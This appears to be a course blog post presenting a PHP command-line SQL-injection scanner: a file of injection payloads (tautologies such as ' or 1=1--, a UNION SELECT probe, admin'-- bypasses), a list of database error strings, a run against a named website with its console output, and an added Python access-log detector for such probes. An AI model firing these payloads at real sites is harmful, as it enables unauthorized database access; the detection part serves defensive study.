SQL Injection Tool - Bonus Topic
Hi. This topic is a bonus in the course, since we haven't covered SQL injection yet, but here it is.
How to use it: since it is a CLI script, we run it from the console.
1. Fill in the injections file.
Example:
tail -f sqli_dorks.txt
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Add more injections to this file, one per line.
2. Fill in the errors file.
Example:
tail -f sqli_errors.txt
error mysql_error
mysql_error
Warning
mysql_fetch_array()
supplied argument
You have an error in your SQL syntax;
Add more errors to this file, one per line.
3. Run the SQL injection discovery script:
php gsi0.com_sqli_injection_discover.php -isqli_dorks.txt -esqli_errors.txt -t"www.jamesjara.com/?articuloid=123{inyectme}&foo=bar"
Result:
[root@localhost sql-injection]# php gsi0.com_sqli_injection_discover.php -isqli_dorks.txt -esqli_errors.txt -t"www.jamesjara.com/?articuloid=123{inyectme}&foo=ba"
==== welcome gsi0.com ARMY by @jamesjara , wait.. the pentesting is starting...
<><><> - - Executing new dork #0 - [admin'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #1 - [' or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #2 - ['" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #3 - [' union select 1, 'Eyeless', 'ez2do', 1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #4 - [admin'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #5 - [administrator'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #6 - [superuser'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #7 - [test'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #8 - [' or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #9 - [' or 0=0 --']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #10 - [' or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #11 - [" or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #12 - [" or 0=0 --']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #13 - ['" or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #14 - [or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #15 - [' or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #16 - [" or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #17 - [or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #18 - [' or 'x'='x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #19 - [" or "x"="x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #20 - [') or ('x'='x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #21 - [" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #22 - [or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #23 - [' or a=a--']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #24 - [' or a=a #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #25 - [' or a=a--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #26 - [' or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #27 - [' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #28 - [" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #29 - [') or ('a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #30 - [") or ("a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #31 - [hi" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #32 - [hi" or 1=1 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #33 - [hi' or 1=1 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #34 - [hi' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #35 - [hi') or ('a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #36 - [hi") or ("a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #37 - [' or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #38 - [" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #39 - [or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #40 - [' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #41 - [" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #42 - [') or ('a'='a]
<><><><><> - - - - - Result: negative
========================================
==== #0 injections founded ...
==== welcome gsi0.com ARMY by @jamesjara , pentesting FINISHED ,check results.txt ...
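Seen from the target's side, a run like the one above shows up in the access log as one client sending a burst of requests whose decoded parameter carries the probe shapes from sqli_dorks.txt. The following is an added example, not part of the original post or of the tool; the log lines are constructed, and the patterns, function names and threshold are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Shapes of the probes in sqli_dorks.txt (these patterns are this example's assumption).
PROBE = re.compile(r"""
    \bor\s+\(?\s*(['"]?)(\w+)\1\s*=\s*['"]?\2\b   # OR x=x tautology
  | ['"]\s*(?:--|\#)                              # quote, then a SQL comment
  | \bunion\s+select\b                            # UNION SELECT probe
""", re.IGNORECASE | re.VERBOSE)

# Apache/nginx "combined" access-log prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def _line(ip, target, status):
    return f'{ip} - - [10/Oct/2023:13:55:36 +0000] "GET {target} HTTP/1.1" {status} 512'

# Constructed sample log (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    _line("203.0.113.7", "/?articuloid=123%27%20or%201%3D1--&foo=bar", 200),
    _line("203.0.113.7", "/?articuloid=123hi%27)%20or%20(%27a%27%3D%27a&foo=bar", 200),
    _line("203.0.113.7", "/?articuloid=123admin%27--&foo=bar", 500),
    _line("198.51.100.4", "/?articuloid=124&foo=bar", 200),
    _line("198.51.100.4", "/?q=black+or+white&color=red", 200),  # benign "or"
]

def probe_hits(lines):
    """Map client IP -> [(param, decoded value, status)] for probe-like requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, status = m.groups()
        # parse_qsl percent-decodes, so encoded quotes and spaces are matched too.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if PROBE.search(value):
                hits[ip].append((name, value, int(status)))
    return dict(hits)

def scanners(lines, threshold=3):
    """Clients with at least `threshold` probe requests (a wordlist run)."""
    return sorted(ip for ip, h in probe_hits(lines).items() if len(h) >= threshold)

def errored_probes(lines):
    """Probes answered with 5xx: review those responses for leaked database errors."""
    return [(ip, name, value) for ip, h in probe_hits(lines).items()
            for name, value, status in h if status >= 500]

if __name__ == "__main__":
    print(scanners(SAMPLE_LOG), errored_probes(SAMPLE_LOG))
```

A 5xx answer to a probe is the case to chase first, because the strings in sqli_errors.txt only appear when the application echoes database errors to the client.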
Well, thanks for your time.
-- James jara, @jamesjara
Simple and useful!